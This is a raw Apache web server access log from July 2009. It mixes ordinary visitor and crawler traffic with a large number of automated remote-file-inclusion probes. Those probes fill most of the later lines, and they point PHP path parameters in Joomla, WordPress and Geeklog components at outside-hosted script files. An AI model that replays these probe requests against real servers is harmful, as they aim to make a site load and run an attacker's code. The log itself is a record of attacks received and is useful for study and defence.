201.171.107.90 - - [13/Jul/2009:02:10:54 -0400] "GET /favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; WinuE v6; InfoPath.2; OfficeLiveConnector.1.3; OfficeLivePatch.0.0; WinuE v6)"
201.171.107.90 - - [13/Jul/2009:02:10:54 -0400] "GET /images/head_aceLogo-over.gif HTTP/1.1" 200 1296 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):10+RNSUBS (S0040):03" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; WinuE v6; InfoPath.2; OfficeLiveConnector.1.3; OfficeLivePatch.0.0; WinuE v6)"
201.171.107.90 - - [13/Jul/2009:02:10:54 -0400] "GET /images/head_btn-shop-over.gif HTTP/1.1" 200 1473 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):10+RNSUBS (S0040):03" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; WinuE v6; InfoPath.2; OfficeLiveConnector.1.3; OfficeLivePatch.0.0; WinuE v6)"
201.171.107.90 - - [13/Jul/2009:02:10:54 -0400] "GET /images/head_btn-products-over.gif HTTP/1.1" 200 1396 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):10+RNSUBS (S0040):03" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; WinuE v6; InfoPath.2; OfficeLiveConnector.1.3; OfficeLivePatch.0.0; WinuE v6)"
201.171.107.90 - - [13/Jul/2009:02:10:54 -0400] "GET /images/head_btn-catalog-over.gif HTTP/1.1" 200 1354 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):10+RNSUBS (S0040):03" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; WinuE v6; InfoPath.2; OfficeLiveConnector.1.3; OfficeLivePatch.0.0; WinuE v6)"
201.171.107.90 - - [13/Jul/2009:02:10:54 -0400] "GET /images/head_btn-brochures-over.gif HTTP/1.1" 200 1392 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):10+RNSUBS (S0040):03" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; WinuE v6; InfoPath.2; OfficeLiveConnector.1.3; OfficeLivePatch.0.0; WinuE v6)"
201.171.107.90 - - [13/Jul/2009:02:10:55 -0400] "GET /images/head_btn-aboutUs-over.gif HTTP/1.1" 200 1156 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):10+RNSUBS (S0040):03" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; WinuE v6; InfoPath.2; OfficeLiveConnector.1.3; OfficeLivePatch.0.0; WinuE v6)"
201.171.107.90 - - [13/Jul/2009:02:10:55 -0400] "GET /images/head_btn-tutorials-over.gif HTTP/1.1" 200 1097 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):10+RNSUBS (S0040):03" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; WinuE v6; InfoPath.2; OfficeLiveConnector.1.3; OfficeLivePatch.0.0; WinuE v6)"
201.171.107.90 - - [13/Jul/2009:02:10:55 -0400] "GET /images/head_btn-seminars-over.gif HTTP/1.1" 200 1089 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):10+RNSUBS (S0040):03" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; WinuE v6; InfoPath.2; OfficeLiveConnector.1.3; OfficeLivePatch.0.0; WinuE v6)"
201.171.107.90 - - [13/Jul/2009:02:10:55 -0400] "GET /images/head_btn-conventions-over.gif HTTP/1.1" 200 1195 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):10+RNSUBS (S0040):03" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; WinuE v6; InfoPath.2; OfficeLiveConnector.1.3; OfficeLivePatch.0.0; WinuE v6)"
201.171.107.90 - - [13/Jul/2009:02:10:55 -0400] "GET /images/head_btn-contactUs-over.gif HTTP/1.1" 200 1110 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):10+RNSUBS (S0040):03" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; WinuE v6; InfoPath.2; OfficeLiveConnector.1.3; OfficeLivePatch.0.0; WinuE v6)"
201.171.107.90 - - [13/Jul/2009:02:10:58 -0400] "GET /images/login_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/contact.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; WinuE v6; InfoPath.2; OfficeLiveConnector.1.3; OfficeLivePatch.0.0; WinuE v6)"
201.171.107.90 - - [13/Jul/2009:02:10:58 -0400] "GET /images/psearch_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/contact.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; WinuE v6; InfoPath.2; OfficeLiveConnector.1.3; OfficeLivePatch.0.0; WinuE v6)"
201.171.107.90 - - [13/Jul/2009:02:10:59 -0400] "GET /images/head_btn-contactUs.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):10+RNSUBS (S0040):03" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; WinuE v6; InfoPath.2; OfficeLiveConnector.1.3; OfficeLivePatch.0.0; WinuE v6)"
201.171.107.90 - - [13/Jul/2009:02:11:00 -0400] "GET /images/login_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/contact.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; WinuE v6; InfoPath.2; OfficeLiveConnector.1.3; OfficeLivePatch.0.0; WinuE v6)"
201.171.107.90 - - [13/Jul/2009:02:11:00 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/contact.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; WinuE v6; InfoPath.2; OfficeLiveConnector.1.3; OfficeLivePatch.0.0; WinuE v6)"
209.59.12.99 - - [13/Jul/2009:02:11:04 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
201.171.107.90 - - [13/Jul/2009:02:11:09 -0400] "GET /images/head_btn-tutorials.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):10+RNSUBS (S0040):03" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; WinuE v6; InfoPath.2; OfficeLiveConnector.1.3; OfficeLivePatch.0.0; WinuE v6)"
201.171.107.90 - - [13/Jul/2009:02:11:10 -0400] "GET /images/login_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/about.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; WinuE v6; InfoPath.2; OfficeLiveConnector.1.3; OfficeLivePatch.0.0; WinuE v6)"
201.171.107.90 - - [13/Jul/2009:02:11:10 -0400] "GET /images/psearch_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/about.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; WinuE v6; InfoPath.2; OfficeLiveConnector.1.3; OfficeLivePatch.0.0; WinuE v6)"
201.171.107.90 - - [13/Jul/2009:02:11:10 -0400] "GET /images/head_btn-aboutUs.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):10+RNSUBS (S0040):03" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; WinuE v6; InfoPath.2; OfficeLiveConnector.1.3; OfficeLivePatch.0.0; WinuE v6)"
201.171.107.90 - - [13/Jul/2009:02:11:10 -0400] "GET /images/head_btn-seminars.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):10+RNSUBS (S0040):03" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; WinuE v6; InfoPath.2; OfficeLiveConnector.1.3; OfficeLivePatch.0.0; WinuE v6)"
201.171.107.90 - - [13/Jul/2009:02:11:10 -0400] "GET /images/head_btn-conventions.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):10+RNSUBS (S0040):03" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; WinuE v6; InfoPath.2; OfficeLiveConnector.1.3; OfficeLivePatch.0.0; WinuE v6)"
201.171.107.90 - - [13/Jul/2009:02:11:11 -0400] "GET /images/login_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/about.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; WinuE v6; InfoPath.2; OfficeLiveConnector.1.3; OfficeLivePatch.0.0; WinuE v6)"
201.171.107.90 - - [13/Jul/2009:02:11:11 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/about.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; WinuE v6; InfoPath.2; OfficeLiveConnector.1.3; OfficeLivePatch.0.0; WinuE v6)"
66.249.68.247 - - [13/Jul/2009:02:11:47 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L0184CE46081442003A81031+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
59.22.140.17 - - [13/Jul/2009:02:11:54 -0400] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
59.22.140.17 - - [13/Jul/2009:02:11:54 -0400] "GET /logs/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
59.22.140.17 - - [13/Jul/2009:02:12:07 -0400] "GET /logs/access_log.Q109062900/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
117.74.99.225 - - [13/Jul/2009:02:12:55 -0400] "GET /logs/access_log.Q109061300/index1.php?page=http://yoursupplements4you.com/wp-content/themes/diarykey/images/img08.jpg??? HTTP/1.1" 404 235 "-" "libwww-perl/5.79"
117.74.99.225 - - [13/Jul/2009:02:12:55 -0400] "GET /index1.php?page=http://yoursupplements4you.com/wp-content/themes/diarykey/images/img08.jpg??? HTTP/1.1" 404 208 "-" "libwww-perl/5.79"
117.74.99.225 - - [13/Jul/2009:02:12:56 -0400] "GET /logs/index1.php?page=http://yoursupplements4you.com/wp-content/themes/diarykey/images/img08.jpg??? HTTP/1.1" 404 213 "-" "libwww-perl/5.79"
201.232.54.48 - - [13/Jul/2009:02:13:04 -0400] "GET /logs/access_log.Q109051400%20%20/appserv/main.php?appserv_root=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
201.232.54.48 - - [13/Jul/2009:02:13:14 -0400] "GET /logs/access_log.Q109051800%20%20/appserv/main.php?appserv_root=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
117.74.99.225 - - [13/Jul/2009:02:13:15 -0400] "GET /logs/access_log.Q109070400/index1.php?page=http://yoursupplements4you.com/wp-content/themes/diarykey/images/img08.jpg??? HTTP/1.1" 404 235 "-" "libwww-perl/5.79"
116.127.121.39 - - [13/Jul/2009:02:14:02 -0400] "GET /logs/access_log.Q109061200%20%20///?_SERVER[DOCUMENT_ROOT]=http://www.qting.co.kr/main/ucc/files/zfxid.txt?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
116.127.121.39 - - [13/Jul/2009:02:14:02 -0400] "GET ///?_SERVER[DOCUMENT_ROOT]=http://www.qting.co.kr/main/ucc/files/zfxid.txt?? HTTP/1.1" 200 453 "-" "Mozilla/5.0"
116.127.121.39 - - [13/Jul/2009:02:14:02 -0400] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://www.qting.co.kr/main/ucc/files/zfxid.txt?? HTTP/1.1" 200 9330 "-" "Mozilla/5.0"
77.221.130.14 - - [13/Jul/2009:02:14:17 -0400] "GET /index.php?meio.php=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
77.221.130.14 - - [13/Jul/2009:02:14:17 -0400] "GET /logs/index.php?meio.php=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
77.221.130.14 - - [13/Jul/2009:02:14:17 -0400] "GET /logs/access_log.Q109062700/index.php?meio.php=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
116.127.121.39 - - [13/Jul/2009:02:14:26 -0400] "GET /logs/error_log.Q109061200%20%20///?_SERVER[DOCUMENT_ROOT]=http://www.qting.co.kr/main/ucc/files/zfxid.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
124.0.145.1 - - [13/Jul/2009:02:14:50 -0400] "GET /logs/errors.php?error=http://www.qting.co.kr/main/ucc/files/zfxid.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
124.0.145.1 - - [13/Jul/2009:02:14:50 -0400] "GET /logs/access_log.Q109051700%20%20/errors.php?error=http://www.qting.co.kr/main/ucc/files/zfxid.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
124.0.145.1 - - [13/Jul/2009:02:14:50 -0400] "GET /errors.php?error=http://www.qting.co.kr/main/ucc/files/zfxid.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
68.109.233.157 - - [13/Jul/2009:02:14:59 -0400] "GET /logs/error_log.Q109052300////?_SERVER[DOCUMENT_ROOT]=http://inamsan.kg.kr/emt/id.txt??? HTTP/1.1" 404 227 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
68.109.233.157 - - [13/Jul/2009:02:14:59 -0400] "GET ////?_SERVER[DOCUMENT_ROOT]=http://inamsan.kg.kr/emt/id.txt??? HTTP/1.1" 200 454 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
68.109.233.157 - - [13/Jul/2009:02:14:59 -0400] "GET /logs/access_log.Q109052300////?_SERVER[DOCUMENT_ROOT]=http://inamsan.kg.kr/emt/id.txt??? HTTP/1.1" 404 228 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
65.254.32.2 - - [13/Jul/2009:02:15:40 -0400] "GET /logs/access_log.Q109061300/errors.php?error=http://www.smilewig.com/bbs/chase/images/remember.txt????????? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
77.221.130.14 - - [13/Jul/2009:02:16:27 -0400] "GET /logs/access_log.Q109062700%20%20/index.php?meio.php=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
116.127.121.39 - - [13/Jul/2009:02:16:43 -0400] "GET /logs/error_log.Q109070100%20%20///?_SERVER[DOCUMENT_ROOT]=http://www.qting.co.kr/main/ucc/files/zfxid.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
212.158.167.98 - - [13/Jul/2009:02:16:50 -0400] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://83.3.132.70/iGeoMap/www//tmp/roxx.jpg??? HTTP/1.1" 404 260 "-" "libwww-perl/5.810"
59.22.140.17 - - [13/Jul/2009:02:17:05 -0400] "GET /logs/access_log.Q109062900%20%20/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
124.0.139.129 - - [13/Jul/2009:02:17:19 -0400] "GET /logs/errors.php?error=http://www.qting.co.kr/main/ucc/files/zfxid.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
124.0.139.129 - - [13/Jul/2009:02:17:19 -0400] "GET /errors.php?error=http://www.qting.co.kr/main/ucc/files/zfxid.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
124.0.139.129 - - [13/Jul/2009:02:17:19 -0400] "GET /logs/access_log.Q109051700%20%20/errors.php?error=http://www.qting.co.kr/main/ucc/files/zfxid.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
116.127.121.39 - - [13/Jul/2009:02:17:21 -0400] "GET /logs/error_log.Q109052900%20%20///?_SERVER[DOCUMENT_ROOT]=http://www.qting.co.kr/main/ucc/files/zfxid.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
218.249.36.194 - - [13/Jul/2009:02:17:21 -0400] "GET /index.php?meio.php=http://www.openyourrus.ru/bitrix/tools/29id.txt?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
218.249.36.194 - - [13/Jul/2009:02:17:21 -0400] "GET /logs/index.php?meio.php=http://www.openyourrus.ru/bitrix/tools/29id.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
218.249.36.194 - - [13/Jul/2009:02:17:21 -0400] "GET /logs/access_log.Q109062700/index.php?meio.php=http://www.openyourrus.ru/bitrix/tools/29id.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
218.249.36.194 - - [13/Jul/2009:02:17:28 -0400] "GET /logs/error_log.Q109050700/index.php?meio.php=http://www.openyourrus.ru/bitrix/tools/29id.txt?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
212.158.167.98 - - [13/Jul/2009:02:17:41 -0400] "GET /logs/error_log.Q109052500//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://83.3.132.70/iGeoMap/www//tmp/roxx.jpg??? HTTP/1.1" 404 286 "-" "libwww-perl/5.810"
212.158.167.98 - - [13/Jul/2009:02:17:41 -0400] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://83.3.132.70/iGeoMap/www//tmp/roxx.jpg??? HTTP/1.1" 404 260 "-" "libwww-perl/5.810"
212.158.167.98 - - [13/Jul/2009:02:17:41 -0400] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://83.3.132.70/iGeoMap/www//tmp/roxx.jpg??? HTTP/1.1" 404 265 "-" "libwww-perl/5.810"
116.127.121.39 - - [13/Jul/2009:02:17:47 -0400] "GET /logs/access_log.Q109062400%20%20///?_SERVER[DOCUMENT_ROOT]=http://www.qting.co.kr/main/ucc/files/zfxid.txt?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
59.22.140.17 - - [13/Jul/2009:02:17:48 -0400] "GET /logs/access_log.Q109050900%20%20/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
117.74.99.225 - - [13/Jul/2009:02:17:55 -0400] "GET /logs/access_log.Q109070400%20/index1.php?page=http://yoursupplements4you.com/wp-content/themes/diarykey/images/img08.jpg??? HTTP/1.1" 404 236 "-" "libwww-perl/5.79"
218.249.36.194 - - [13/Jul/2009:02:18:00 -0400] "GET /index.php?meio.php=http://www.openyourrus.ru/bitrix/tools/29id.txt?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
218.249.36.194 - - [13/Jul/2009:02:18:00 -0400] "GET /logs/index.php?meio.php=http://www.openyourrus.ru/bitrix/tools/29id.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
218.249.36.194 - - [13/Jul/2009:02:18:00 -0400] "GET /logs/access_log.Q109062700/index.php?meio.php=http://www.openyourrus.ru/bitrix/tools/29id.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
218.249.36.194 - - [13/Jul/2009:02:18:09 -0400] "GET /logs/error_log.Q109050700/index.php?meio.php=http://www.openyourrus.ru/bitrix/tools/29id.txt?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
72.30.78.243 - - [13/Jul/2009:02:17:44 -0400] "GET /logs/access_log.Q109070600 HTTP/1.0" 200 4677677 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
124.0.139.129 - - [13/Jul/2009:02:18:18 -0400] "GET /logs/access_log.Q109061300%20%20/errors.php?error=http://www.qting.co.kr/main/ucc/files/zfxid.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
65.254.32.2 - - [13/Jul/2009:02:18:27 -0400] "GET /logs/access_log.Q109051700%20%20/errors.php?error=http://www.smilewig.com/bbs/chase/images/remember.txt????????? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
65.254.32.2 - - [13/Jul/2009:02:18:46 -0400] "GET /logs/access_log.Q109061300%20%20/errors.php?error=http://www.smilewig.com/bbs/chase/images/remember.txt????????? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
202.174.82.220 - - [13/Jul/2009:02:18:59 -0400] "GET /index1.php?page=http://www.2u264.com/bbs//include/idi.txt??? HTTP/1.1" 404 208 "-" "libwww-perl/5.79"
202.174.82.220 - - [13/Jul/2009:02:19:01 -0400] "GET /logs/index1.php?page=http://www.2u264.com/bbs//include/idi.txt??? HTTP/1.1" 404 213 "-" "libwww-perl/5.79"
202.174.82.220 - - [13/Jul/2009:02:19:12 -0400] "GET /logs/access_log.Q109070400%20/index1.php?page=http://www.2u264.com/bbs//include/idi.txt??? HTTP/1.1" 404 236 "-" "libwww-perl/5.79"
200.111.62.19 - - [13/Jul/2009:02:19:15 -0400] "GET //index.php?option=com_frontpage&Itemid=&mosConfig_absolute_path=http://www.goldstrategie.ch/images/inv?? HTTP/1.1" 404 208 "-" "libwww-perl/5.805"
72.30.78.243 - - [13/Jul/2009:02:19:47 -0400] "GET /logs/error_log.Q109061500 HTTP/1.0" 200 2959056 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
212.158.167.98 - - [13/Jul/2009:02:20:12 -0400] "GET /logs/access_log.Q109052500//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://83.3.132.70/iGeoMap/www//tmp/roxx.jpg??? HTTP/1.1" 404 287 "-" "libwww-perl/5.810"
124.0.139.129 - - [13/Jul/2009:02:20:24 -0400] "GET /logs//?path%5Bdocroot%5D=http://www.qting.co.kr/main/ucc/files/zfxid.txt?? HTTP/1.1" 200 9329 "-" "Mozilla/5.0"
124.0.139.129 - - [13/Jul/2009:02:20:24 -0400] "GET /logs/access_log.Q109051800%20%20//?path%5Bdocroot%5D=http://www.qting.co.kr/main/ucc/files/zfxid.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
124.0.139.129 - - [13/Jul/2009:02:20:24 -0400] "GET //?path%5Bdocroot%5D=http://www.qting.co.kr/main/ucc/files/zfxid.txt?? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
124.0.139.129 - - [13/Jul/2009:02:20:34 -0400] "GET /logs/access_log.Q109053100%20%20//?path%5Bdocroot%5D=http://www.qting.co.kr/main/ucc/files/zfxid.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
209.59.12.99 - - [13/Jul/2009:02:20:43 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
218.249.36.194 - - [13/Jul/2009:02:20:44 -0400] "GET /logs/access_log.Q109062700%20%20/index.php?meio.php=http://www.openyourrus.ru/bitrix/tools/29id.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
218.249.36.194 - - [13/Jul/2009:02:20:44 -0400] "GET /logs/error_log.Q109050700%20%20/index.php?meio.php=http://www.openyourrus.ru/bitrix/tools/29id.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
72.30.78.243 - - [13/Jul/2009:02:19:48 -0400] "GET /logs/error_log.Q109061500 HTTP/1.0" 200 2959056 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
116.127.121.39 - - [13/Jul/2009:02:20:58 -0400] "GET /logs/access_log.Q109070100%20%20///?_SERVER[DOCUMENT_ROOT]=http://www.qting.co.kr/main/ucc/files/zfxid.txt?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
66.249.68.247 - - [13/Jul/2009:02:21:19 -0400] "GET /robots.txt HTTP/1.1" 404 208 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.68.247 - - [13/Jul/2009:02:21:19 -0400] "GET /logs/error_log.Q108051500 HTTP/1.1" 404 223 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
59.22.140.17 - - [13/Jul/2009:02:21:56 -0400] "GET /logs/access_log.Q109062900/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
59.22.140.17 - - [13/Jul/2009:02:21:56 -0400] "GET /logs/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
59.22.140.17 - - [13/Jul/2009:02:21:56 -0400] "GET /administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
202.174.82.220 - - [13/Jul/2009:02:22:16 -0400] "GET /logs/access_log.Q109061500%20/plugins/spamx/MassDelete.Admin.class.php/geeklog//plugins/spamx/BaseAdmin.class.php?_CONF[path]=http://www.2u264.com/bbs//include/idi.txt??? HTTP/1.1" 404 309 "-" "libwww-perl/5.79"
116.127.121.39 - - [13/Jul/2009:02:22:47 -0400] "GET /logs/access_log.Q109052900%20%20///?_SERVER[DOCUMENT_ROOT]=http://www.qting.co.kr/main/ucc/files/zfxid.txt?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
202.174.82.220 - - [13/Jul/2009:02:23:38 -0400] "GET /logs/access_log.Q109061500%20/plugins/spamx/MassDelete.Admin.class.php/geeklog//plugins/spamx/BaseAdmin.class.php?_CONF[path]=http://www.2u264.com/bbs//include/idi.txt??? HTTP/1.1" 404 309 "-" "libwww-perl/5.79"
59.22.140.17 - - [13/Jul/2009:02:24:04 -0400] "GET /logs/access_log.Q109050900/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
